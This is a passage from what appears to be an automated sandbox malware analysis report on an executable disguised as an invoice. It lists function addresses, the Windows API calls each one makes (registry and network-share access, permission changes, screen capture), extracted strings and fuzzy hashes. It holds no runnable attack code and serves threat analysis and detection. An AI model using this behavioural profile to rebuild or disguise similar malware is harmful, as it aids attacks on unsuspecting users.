                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0025E809
                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0025E834
                                                              • DeleteObject.GDI32(00000000), ref: 0025E85C
                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0025E872
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                              • String ID:
                                                              • API String ID: 3840717409-0
                                                              • Opcode ID: 256a9f3ef55c011fbb327d716369826daa845df8609126327516865b9a1e64f6
                                                              • Instruction ID: 02e4a37925feeb0713ff2607bf547bdfaf76910e6f990ed460c8a53e0ca84ed9
                                                              • Opcode Fuzzy Hash: 256a9f3ef55c011fbb327d716369826daa845df8609126327516865b9a1e64f6
                                                              • Instruction Fuzzy Hash: 6F415B75600205FFDB119F65EC4CEAABBB9EF89711F108058F909D7261C731AE85DB20
                                                              Function 002405F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __wsplitpath.LIBCMT ref: 0024076F
                                                              • _wcscat.LIBCMT ref: 00240787
                                                              • _wcscat.LIBCMT ref: 00240799
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002407AE
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 002407C2
                                                              • GetFileAttributesW.KERNEL32(?), ref: 002407DA
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 002407F4
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00240806
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                              • String ID: *.*
                                                              • API String ID: 34673085-438819550
                                                              • Opcode ID: e1a33b1765406374e555676a0a5a268d1ffc914d039c580fd31f90041bdca2cf
                                                              • Instruction ID: 42ccc534db08331c8f14fbe53a31bd8a72bbcfeed9c2b172400a4a973f908c0c
                                                              • Opcode Fuzzy Hash: e1a33b1765406374e555676a0a5a268d1ffc914d039c580fd31f90041bdca2cf
                                                              • Instruction Fuzzy Hash: 198182715243069FCB28DF24C48596EB3E8BFD8304F15482EFA8AD7251E770D9A58F92
                                                              Function 0025EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0025EF3B
                                                              • GetFocus.USER32 ref: 0025EF4B
                                                              • GetDlgCtrlID.USER32(00000000), ref: 0025EF56
                                                              • _memset.LIBCMT ref: 0025F081
                                                              • GetMenuItemInfoW.USER32 ref: 0025F0AC
                                                              • GetMenuItemCount.USER32(00000000), ref: 0025F0CC
                                                              • GetMenuItemID.USER32(?,00000000), ref: 0025F0DF
                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0025F113
                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0025F15B
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0025F193
                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0025F1C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                              • String ID: 0
                                                              • API String ID: 1296962147-4108050209
                                                              • Opcode ID: 1b663b06864a2446a549ee7f391b6013a252d6fe97f87ac3271606fda2275e8b
                                                              • Instruction ID: ead8ee36b94178ab6621b52fb17bcf7daf5c5dd0899f5fb26783b41263e1b728
                                                              • Opcode Fuzzy Hash: 1b663b06864a2446a549ee7f391b6013a252d6fe97f87ac3271606fda2275e8b
                                                              • Instruction Fuzzy Hash: 6081AB70124302AFDB24CF14D984A6BBBE8FF88315F10452EFD8897291D770D929CBA6
                                                              Function 0022A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0022ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0022ABD7
                                                                • Part of subcall function 0022ABBB: GetLastError.KERNEL32(?,0022A69F,?,?,?), ref: 0022ABE1
                                                                • Part of subcall function 0022ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0022A69F,?,?,?), ref: 0022ABF0
                                                                • Part of subcall function 0022ABBB: HeapAlloc.KERNEL32(00000000,?,0022A69F,?,?,?), ref: 0022ABF7
                                                                • Part of subcall function 0022ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0022AC0E
                                                                • Part of subcall function 0022AC56: GetProcessHeap.KERNEL32(00000008,0022A6B5,00000000,00000000,?,0022A6B5,?), ref: 0022AC62
                                                                • Part of subcall function 0022AC56: HeapAlloc.KERNEL32(00000000,?,0022A6B5,?), ref: 0022AC69
                                                                • Part of subcall function 0022AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0022A6B5,?), ref: 0022AC7A
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0022A8CB
                                                              • _memset.LIBCMT ref: 0022A8E0
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0022A8FF
                                                              • GetLengthSid.ADVAPI32(?), ref: 0022A910
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0022A94D
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0022A969
                                                              • GetLengthSid.ADVAPI32(?), ref: 0022A986
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0022A995
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0022A99C
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0022A9BD
                                                              • CopySid.ADVAPI32(00000000), ref: 0022A9C4
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0022A9F5
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0022AA1B
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0022AA2F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: e1dae23bc0edf81779a44bc40b6565f4776e262b6c00c84cc0a66e4321caa024
                                                              • Instruction ID: 902c8002e7ad143f85a800d2c994b230dd0420a257df95dba1c0dc3b75986c1d
                                                              • Opcode Fuzzy Hash: e1dae23bc0edf81779a44bc40b6565f4776e262b6c00c84cc0a66e4321caa024
                                                              • Instruction Fuzzy Hash: 18515A7191021ABFDF00DF90EC89EEEBBB9FF04300F048129F915AA690DB309A55CB61
                                                              Function 00249DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00249E36
                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00249E42
                                                              • CreateCompatibleDC.GDI32(?), ref: 00249E4E
                                                              • SelectObject.GDI32(00000000,?), ref: 00249E5B
                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00249EAF
                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00249EEB
                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00249F0F
                                                              • SelectObject.GDI32(00000006,?), ref: 00249F17
                                                              • DeleteObject.GDI32(?), ref: 00249F20
                                                              • DeleteDC.GDI32(00000006), ref: 00249F27
                                                              • ReleaseDC.USER32(00000000,?), ref: 00249F32
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                              • String ID: (
                                                              • API String ID: 2598888154-3887548279
                                                              • Opcode ID: 13ca1ca0e5e8e33a1fbd6f0710af5a90b631cce19ef4ecd67503f55f6b0b1d5c
                                                              • Instruction ID: 3193fa1509703eec613a0c6bf6f5c9f57a4cbf4886672b1852a660251ad9ec76
                                                              • Opcode Fuzzy Hash: 13ca1ca0e5e8e33a1fbd6f0710af5a90b631cce19ef4ecd67503f55f6b0b1d5c
                                                              • Instruction Fuzzy Hash: 44513875A00309EFCB14CFA8D889EAFBBB9EF48710F14841DF95AA7250D731A981CB50
                                                              Function 0023CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 2889450990-2391861430
                                                              • Opcode ID: d92d00f7ea892928024ee63383f833def75c1f014d62a7d713b8f98b59a97b97
                                                              • Instruction ID: 8eaebe3386322e029d31302417c5a08c386debba885b4a670f2ba0ffb894af4a
                                                              • Opcode Fuzzy Hash: d92d00f7ea892928024ee63383f833def75c1f014d62a7d713b8f98b59a97b97
                                                              • Instruction Fuzzy Hash: C0518C7181010DABCB14FBA0DE46EEEB779AF19344F200165F605720A2EB316F69DFA0
                                                              Function 0023CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 2889450990-3420473620
                                                              • Opcode ID: 623d7651ca698d609c03a4c069365929e45416478b36531b98adbd1536812f19
                                                              • Instruction ID: d3c2837d9f05072ccb6783a3fd9b55fb8e06f2710cf9df22999afaf358d44ede
                                                              • Opcode Fuzzy Hash: 623d7651ca698d609c03a4c069365929e45416478b36531b98adbd1536812f19
                                                              • Instruction Fuzzy Hash: 1C51A07191020DAACB14FBE0DE46EEEB779AF15344F100165F60572092EB706F69DFA0
                                                              Function 00253C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00252BB5,?,?), ref: 00253C1D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: $E*$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                              • API String ID: 3964851224-1088933313
                                                              • Opcode ID: dcae2dfc4487c11a5d29f5a7a9b5e9bf5c6cfb39b4157102afbd368707a7f78c
                                                              • Instruction ID: 62efeede1ce03baa75b21bbfa2eeb9357ba84d91ed84f8a9e1796684150f1f5b
                                                              • Opcode Fuzzy Hash: dcae2dfc4487c11a5d29f5a7a9b5e9bf5c6cfb39b4157102afbd368707a7f78c
                                                              • Instruction Fuzzy Hash: 3F415F3123024A8BDF04EF14D841AEA3375AF62781F515819EC551B292EBB1EE7ECB54
                                                              Function 002355BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 002355D7
                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00235664
                                                              • GetMenuItemCount.USER32(002B1708), ref: 002356ED
                                                              • DeleteMenu.USER32(002B1708,00000005,00000000,000000F5,?,?), ref: 0023577D
                                                              • DeleteMenu.USER32(002B1708,00000004,00000000), ref: 00235785
                                                              • DeleteMenu.USER32(002B1708,00000006,00000000), ref: 0023578D
                                                              • DeleteMenu.USER32(002B1708,00000003,00000000), ref: 00235795
                                                              • GetMenuItemCount.USER32(002B1708), ref: 0023579D
                                                              • SetMenuItemInfoW.USER32(002B1708,00000004,00000000,00000030), ref: 002357D3
                                                              • GetCursorPos.USER32(?), ref: 002357DD
                                                              • SetForegroundWindow.USER32(00000000), ref: 002357E6
                                                              • TrackPopupMenuEx.USER32(002B1708,00000000,?,00000000,00000000,00000000), ref: 002357F9
                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00235805
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                              • String ID:
                                                              • API String ID: 3993528054-0
                                                              • Opcode ID: 373b0f91b159f2026850ad35da44f108de83f99beef17b641e8d1af2cf6404dc
                                                              • Instruction ID: deb6f8d8bf6fd469fb2cfde8d3de574cd829b2e415a9e736fb75cc4841d73664
                                                              • Opcode Fuzzy Hash: 373b0f91b159f2026850ad35da44f108de83f99beef17b641e8d1af2cf6404dc
                                                              • Instruction Fuzzy Hash: E471D5B0660A26BBEB209F15DC4AFAABF69FF00364F540205F51C6A1E0C7B16C60DB94
                                                              Function 0022A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 0022A1DC
                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0022A211
                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0022A22D
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0022A249
                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0022A273
                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0022A29B
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0022A2A6
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0022A2AB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                              • API String ID: 1687751970-22481851
                                                              • Opcode ID: d10d51f475d08af44b1bb9316bc64b5a4af2f1375ca0246397666b2b943abd45
                                                              • Instruction ID: cf4f9da41b3afc5799f1ff44f6c33fee2b69e676b48b636a6ffd179ebc522529
                                                              • Opcode Fuzzy Hash: d10d51f475d08af44b1bb9316bc64b5a4af2f1375ca0246397666b2b943abd45
                                                              • Instruction Fuzzy Hash: A141E47681022DABDB11EBA4EC859EEB7B8AF14340F004169F905A3161EB74AE55CB90
                                                              Function 002367E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __swprintf.LIBCMT ref: 002367FD
                                                              • __swprintf.LIBCMT ref: 0023680A
                                                                • Part of subcall function 0021172B: __woutput_l.LIBCMT ref: 00211784
                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00236834
                                                              • LoadResource.KERNEL32(?,00000000), ref: 00236840
                                                              • LockResource.KERNEL32(00000000), ref: 0023684D
                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 0023686D
                                                              • LoadResource.KERNEL32(?,00000000), ref: 0023687F
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0023688E
                                                              • LockResource.KERNEL32(?), ref: 0023689A
                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 002368F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                              • String ID: 5*
                                                              • API String ID: 1433390588-2646319100
                                                              • Opcode ID: 31f9c0f99584d31687b5a2b81dba4efac5a493d22aa00fdbbdcdce108a660c54
                                                              • Instruction ID: bcb3490d37c05447bcfb57828a6ca29eeb5966f740e8a8a1ca6797b3099ac5ca
                                                              • Opcode Fuzzy Hash: 31f9c0f99584d31687b5a2b81dba4efac5a493d22aa00fdbbdcdce108a660c54
                                                              • Instruction Fuzzy Hash: 9C318FB191021ABBDB109FA0ED5DABB7BBCEF08340F008425F906E2151E770D9769A60
                                                              Function 002325B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002636F4,00000010,?,Bad directive syntax error,0028DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 002325D6
                                                              • LoadStringW.USER32(00000000,?,002636F4,00000010), ref: 002325DD
                                                              • _wprintf.LIBCMT ref: 00232610
                                                              • __swprintf.LIBCMT ref: 00232632
                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002326A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                              • API String ID: 1080873982-4153970271
                                                              • Opcode ID: 2d3e5f85655bf67a3ea07acc5fa060596b816504d45c05a4fb339f4f89838ef4
                                                              • Instruction ID: 073e40fbc5daccbd9e5c2b2e7e1340ed241cd3e56b8773d629db41d14040f180
                                                              • Opcode Fuzzy Hash: 2d3e5f85655bf67a3ea07acc5fa060596b816504d45c05a4fb339f4f89838ef4
                                                              • Instruction Fuzzy Hash: 8221487182021EAFCF11EF90CC4AEEE7B79BF29304F000455F615660A2EB71AA69DF50
                                                              Function 00237AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00237B42
                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00237B58
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00237B69
                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00237B7B
                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00237B8C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: SendString
                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                              • API String ID: 890592661-1007645807
                                                              • Opcode ID: e960b6585698c2e1955038bd3dc69ab803a76bc3a320e2323390f3ba7c486acb
                                                              • Instruction ID: 0fa1e84a73b91c2b70e7ea1ea5d338f9082914ffaea36294acc549eba45c61dc
